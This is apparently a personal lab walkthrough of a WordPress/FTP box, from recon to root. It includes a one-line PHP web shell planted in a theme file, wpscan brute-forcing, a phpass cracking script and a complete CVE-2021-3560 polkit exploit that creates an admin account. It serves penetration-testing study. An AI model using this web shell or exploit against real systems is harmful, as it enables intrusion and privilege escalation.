# Port 21 (FTP) vsftpd 3.0.3

## vuln search

- `searchsploit` only has a DoS for vsftpd 3.0.3 (no RCE, so this is not a foothold)
  ![[images/Pasted image 20260615195811.png]]
- Google search confirms this

## null auth

- anonymous login is allowed; confirm with `nc -nv`
  ![[images/Pasted image 20260615200358.png]]
- and with `telnet`
  ![[images/Pasted image 20260615200728.png]]
- grab the files with `wget`
  ![[images/Pasted image 20260615200628.png]]
- use `tree` to get visibility into the transferred files
  ![[images/Pasted image 20260615200826.png]]
- Notes:
  - `James` is a user with a weak password
  - the WordPress site may use default creds or something simple
  - there is also an LFI on another site

# Port 65000 (http) Apache httpd 2.4.41

## Poke around

- visit the page
  ![[images/Pasted image 20260615202813.png]]
- `/wordpress`
  ![[images/Pasted image 20260615202803.png]]
- pages are served under `/wordpress/index.php/`
- the footer has an interesting `<script src=[...]>` for `wp-embed.min.js`
  - its `ver=` query parameter discloses WordPress version 5.4.1
  ![[images/Pasted image 20260615204005.png]]
- `/wordpress/index.php/meet-the-team/` lists some potential users
  ![[images/Pasted image 20260615204138.png]]
- `wpscan`
  ![[images/Pasted image 20260615214242.png]]
  ![[images/Pasted image 20260615214311.png]]
- `.wp-config.php.swp` > recover the `vim` swap file (`vim -r` rebuilds the buffer; save it with `:w` under a new name)
  ![[images/Pasted image 20260615214002.png]]
```bash
vim -r wp-config.php.swp
```
- `ffuf` scan on the WordPress directory
  ![[images/Pasted image 20260615215125.png]]
- view `/wordpress/wp-content/debug.log`
  ![[images/Pasted image 20260616192657.png]]
- potential upload locations
  ![[images/Pasted image 20260616192750.png]]
- view `/wordpress/wp-login.php`
  ![[images/Pasted image 20260615215432.png]]
- `wpscan` brute-force for `admin` and `james` with `rockyou-50.txt` (~9400 passwords)
  - nothing for `admin`
    ![[images/Pasted image 20260616185401.png]]
  - nothing for `james`
    ![[images/Pasted image 20260616185944.png]]
- try `james` with the full `rockyou.txt`
  - we have creds after 36 minutes
    ![[images/Pasted image 20260616194155.png]]

## WordPress dashboard as `james`

- `james` is an administrator
  ![[images/Pasted image 20260616193321.png]]
- in the theme editor, update the 404 template (`404.php`) with the below (it must sit inside a `<?php` block)
```php
system($_GET[0]);
```
  ![[images/Pasted image 20260616193452.png]]
- getting an error when we click `Update File`
  ![[images/Pasted image 20260616193701.png]]
- some googling indicates that this error occurs for the active theme, so use `twentynineteen` instead of `twentytwenty`
  - that worked for `header.php` but not `404.php`
  ![[images/Pasted image 20260616200234.png]]
- test with `curl`
```bash
curl http://10.10.110.100:65000/wordpress/wp-content/themes/twentynineteen/header.php?0=id
```
  ![[images/Pasted image 20260616200317.png]]
- this time add a revshell to `header.php`
  ![[images/Pasted image 20260616200454.png]]

---

# Shell as `www-data`, then switch context to `james`

- hit `header.php` with `curl` after adding the revshell
  ![[images/Pasted image 20260616200711.png]]
- stabilize the shell with the `script` technique
- `su - james` to switch context to `james`
- we have a flag
  ![[images/Pasted image 20260616201527.png]]
- `.bash_history` also has creds for `balthazar`
- open ports check, groups, and `sudo -l`
  ![[images/Pasted image 20260616202232.png]]

---

# Shell as `balthazar`

## minimal enum

- open a separate `ssh` connection as `balthazar`
  ![[images/Pasted image 20260616202534.png]]
- we have access to an internal network?
  ![[images/Pasted image 20260616202601.png]]
- review `/var/www/html`
  ![[images/Pasted image 20260616203301.png]]
- let's `scp` this `wordpress.bak` to Kali > having permission issues
  ![[images/Pasted image 20260616203327.png]]

## `mysql` session as `shaun`

- enumerate the mysql databases
  ![[images/Pasted image 20260616204150.png]]
- `mysql` db
  ![[images/Pasted image 20260616204208.png]]
- `user` table
  ![[images/Pasted image 20260616204226.png]]
- `wordpress` db
  ![[images/Pasted image 20260616204257.png]]
- `wp_users` table
  ![[images/Pasted image 20260616204324.png]]
- try `INTO OUTFILE` to write a file
  - check privs first: this needs the `FILE` privilege and a permissive `secure_file_priv`
    ![[images/Pasted image 20260616205458.png]]
  - come back to this later
- try to crack the `admin` hash with `hashcat -m 400` (phpass, the `$P$B`-prefixed format in `wp_users`) > wordlist exhausted, no crack
  ![[images/Pasted image 20260616212343.png]]

## run `linpeas.sh`

- kernel and OS version
  ![[images/Pasted image 20260616211014.png]]
- old `sudo` version
  ![[images/Pasted image 20260616211027.png]]
- possibly unmounted filesystems
  ![[images/Pasted image 20260616211038.png]]
- the exploit suggester lists multiple CVEs
  ![[images/Pasted image 20260616211127.png]]
- FOCUS on CVE-2021-3560 (polkit authorises a D-Bus request when the calling client disconnects mid-check)

## run `lazagne.py`

- having issues because we typically need a `venv` for its dependencies

## abuse `polkit` re: CVE-2021-3560

- move `traitor-amd64` to the target and run it > bam!
  ![[images/Pasted image 20260616212750.png]]

---

# Shell as `root`

- we have the flag and an ssh key
  ![[images/Pasted image 20260616212847.png]]
- move `root`'s `id_rsa` to the `loot` directory
  ![[images/Pasted image 20260616213533.png]]
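
Added example for the WordPress recon steps above (the `wp-embed.min.js?ver=` disclosure and the `meet-the-team` page). This is my code, not part of the original notes: it pulls the core version out of page HTML and turns the team names into a username wordlist to hand to `wpscan`. The HTML is constructed for the demo; the host, port and `wp-embed.min.js` path are the lab target from the notes, the team names and the `<h3>` markup are assumptions.

```python
"""Added example, not from the original notes: parse WordPress version
disclosures and build a wpscan username list from a team page.
All HTML below is constructed; the names are made up."""
import re
from html.parser import HTMLParser

# Constructed footer markup in the shape WordPress 5.x emits (assumption:
# the generator meta tag is also present; many themes strip it).
FOOTER_HTML = """
<meta name="generator" content="WordPress 5.4.1" />
<script src='http://10.10.110.100:65000/wordpress/wp-includes/js/wp-embed.min.js?ver=5.4.1'></script>
<script src='http://10.10.110.100:65000/wordpress/wp-content/plugins/demo/demo.js?ver=2.0.3'></script>
"""

# Constructed team page; assumption: each member's name sits in an <h3>.
TEAM_HTML = """
<h1>Meet the team</h1>
<h3>James Smith</h3><p>Founder</p>
<h3>Jane Doe</h3><p>Engineer</p>
"""

# Only core paths (wp-includes/) carry the core version; a ?ver= on a
# plugin or theme asset is that component's version, not WordPress's.
CORE_VER_RE = re.compile(r"/wp-includes/[^\s'\"]*\?ver=([0-9]+(?:\.[0-9]+)+)")
GENERATOR_RE = re.compile(
    r'<meta\s+name=["\']generator["\']\s+content=["\']WordPress\s+([0-9.]+)')


def wp_versions(html: str) -> dict:
    """Return every core-version string the HTML leaks, keyed by source."""
    found = {}
    m = GENERATOR_RE.search(html)
    if m:
        found["generator"] = m.group(1)
    core = sorted(set(CORE_VER_RE.findall(html)))
    if core:
        found["wp-includes"] = core
    return found


class _HeadingNames(HTMLParser):
    """Collect the text inside <h3> tags."""
    def __init__(self):
        super().__init__()
        self.names = []
        self._depth = 0

    def handle_starttag(self, tag, attrs):
        if tag == "h3":
            self._depth += 1

    def handle_endtag(self, tag):
        if tag == "h3" and self._depth:
            self._depth -= 1

    def handle_data(self, data):
        if self._depth and data.strip():
            self.names.append(data.strip())


def team_names(html: str) -> list:
    p = _HeadingNames()
    p.feed(html)
    return p.names


def username_candidates(full_name: str) -> list:
    """Common login-name derivations of a real name, most likely first."""
    parts = [p for p in full_name.lower().split() if p.isalpha()]
    if not parts:
        return []
    first, last = parts[0], parts[-1]
    cands = [first]
    if len(parts) > 1:
        cands += [first + last, f"{first}.{last}", f"{first}_{last}",
                  first[0] + last, last + first[0], last]
    return list(dict.fromkeys(cands))  # dedupe, keep order


def team_wordlist(html: str) -> list:
    """Username list for `wpscan -U`, built from every name on the page."""
    out = []
    for name in team_names(html):
        out += username_candidates(name)
    return list(dict.fromkeys(out))


if __name__ == "__main__":
    print("versions:", wp_versions(FOOTER_HTML))
    print("\n".join(team_wordlist(TEAM_HTML)))
```

Feed the printed list to `wpscan -U <file>` instead of guessing `admin` and `james` by hand; the plugin asset in the sample is there to show why the regex is pinned to `wp-includes/`.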
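
Added example for the `hashcat -m 400` step above. This is my own pure-Python port of the portable phpass scheme WordPress uses for `wp_users` hashes, not code from the notes or from WordPress: it makes concrete what mode 400 is grinding through and why an unsuccessful run ends in "exhausted" rather than quickly. The demo hash, salt and wordlist are constructed here.

```python
"""Added example, not from the original notes: portable phpass ($P$ / $H$)
as cracked by `hashcat -m 400`.  Each guess costs 2**cost MD5 rounds
(WordPress default cost char 'B' = 8192) over an 8-char salt, so a
wordlist run is slow and the hash is useless without the salt prefix."""
import hashlib
import time

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(raw: bytes, count: int) -> str:
    """phpass's own base64 variant (not RFC 4648): 6-bit groups, LSB first."""
    out, i = [], 0
    while i < count:
        value = raw[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= raw[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= raw[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def phpass_hash(password: str, setting: str) -> str:
    """Recompute the hash for `password` under the 12-char setting prefix
    ($P$ or $H$, one cost char, 8-char salt) of an existing hash."""
    if setting[:3] not in ("$P$", "$H$") or len(setting) < 12:
        raise ValueError("not a portable phpass hash")
    cost = ITOA64.index(setting[3])
    if not 7 <= cost <= 30:
        raise ValueError("cost outside phpass range")
    salt = setting[4:12].encode()
    pw = password.encode()
    digest = hashlib.md5(salt + pw).digest()
    for _ in range(1 << cost):          # the expensive part hashcat is grinding
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest, 16)


def check_password(password: str, stored: str) -> bool:
    return phpass_hash(password, stored) == stored


def crack(stored, wordlist):
    """Dictionary attack; returns the plaintext or None when exhausted."""
    for guess in wordlist:
        if check_password(guess, stored):
            return guess
    return None


# Constructed demo hash: WordPress default cost 'B', a fixed made-up salt,
# and a weak password so the toy dictionary below actually finds it.
DEMO_HASH = phpass_hash("summer2020", "$P$Bxk3y9sQp")
DEMO_WORDLIST = ["password", "admin", "letmein", "summer2020", "Winter2021!"]


def guesses_per_second(stored: str, n: int = 50) -> float:
    """Rough single-core rate, to compare with hashcat's speed line."""
    t0 = time.perf_counter()
    for k in range(n):
        phpass_hash(f"guess{k}", stored)
    return n / (time.perf_counter() - t0)


if __name__ == "__main__":
    print("hash :", DEMO_HASH)
    print("crack:", crack(DEMO_HASH, DEMO_WORDLIST))
    print(f"~{guesses_per_second(DEMO_HASH):,.0f} guesses/s here; rockyou.txt has ~14.3M lines")
```

The port can be validated against the fixed vector shipped in phpass's own `test.php`. The practical takeaway for the `admin` hash above is that phpass is salted and iterated, so without a better wordlist or rules the only options are a rule-based run or moving on to a different path (which is what the notes do).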
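
Added example for the `polkit` / CVE-2021-3560 step above, showing the primitive that `traitor` automated. This is my own minimal PoC, not the notes' tooling or Traitor's code: polkit treated a D-Bus request as authorised when the calling client disconnected before the check finished, so killing `dbus-send` a few milliseconds into accounts-daemon's `CreateUser` and `SetPassword` calls yields a new administrator account with a known password. The object paths, method names and the 8 ms delay follow the public GitHub Security Lab write-up of the bug; the account name, password and retry counts are my assumptions, and the race window is host dependent, which is why each call is retried.

```python
"""Added example, not from the original notes: CVE-2021-3560 PoC.
Run as the low-privileged user on the target; it needs accounts-daemon
and an unpatched polkit (< 0.119).  Creates a persistent account, so
remove it when the engagement is over."""
import pwd
import subprocess
import time

ACCOUNTS = "org.freedesktop.Accounts"


def dbus_cmd(path, method, *args):
    """argv for a method call on accounts-daemon over the system bus."""
    return ["dbus-send", "--system", f"--dest={ACCOUNTS}", "--type=method_call",
            "--print-reply", path, method, *args]


def create_user_cmd(name):
    # int32:1 = AccountType administrator; accounts-daemon puts such users
    # in the distro admin group (sudo on Ubuntu).
    return dbus_cmd("/org/freedesktop/Accounts", f"{ACCOUNTS}.CreateUser",
                    f"string:{name}", f"string:{name}", "int32:1")


def set_password_cmd(uid, crypt_hash, hint="hint"):
    return dbus_cmd(f"/org/freedesktop/Accounts/User{uid}",
                    f"{ACCOUNTS}.User.SetPassword",
                    f"string:{crypt_hash}", f"string:{hint}")


def fire_and_kill(argv, delay):
    """Start the call, then kill the client before polkit finishes deciding."""
    p = subprocess.Popen(argv, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    time.sleep(delay)
    p.kill()
    p.wait()


def uid_of(name):
    try:
        return pwd.getpwnam(name).pw_uid
    except KeyError:
        return None


def crypt_hash(password):
    """sha512-crypt string via openssl, the form /etc/shadow stores."""
    return subprocess.check_output(
        ["openssl", "passwd", "-6", password], text=True).strip()


def create_admin_user(name, password, delay=0.008, tries=200):
    """Returns the new uid on success, None if the window was never hit."""
    for _ in range(tries):
        if uid_of(name) is not None:
            break
        fire_and_kill(create_user_cmd(name), delay)
    uid = uid_of(name)
    if uid is None:
        return None
    pw_cmd = set_password_cmd(uid, crypt_hash(password))
    for _ in range(tries // 10):   # no cheap success signal; repeated sets are harmless
        fire_and_kill(pw_cmd, delay)
    return uid


if __name__ == "__main__":
    uid = create_admin_user("pkuser", "Pwn3dByPolkit!")   # made-up creds
    if uid is None:
        print("race window missed; try a different delay")
    else:
        print(f"created uid {uid}: su - pkuser, then sudo -i")
```

If `CreateUser` lands but `su` rejects the password, rerun only the `SetPassword` half with a slightly different delay; `/etc/passwd` tells you the first step worked even though `/etc/shadow` is unreadable. The fix shipped in polkit 0.119, so `linpeas`-style version checks on `polkitd` are the quick triage.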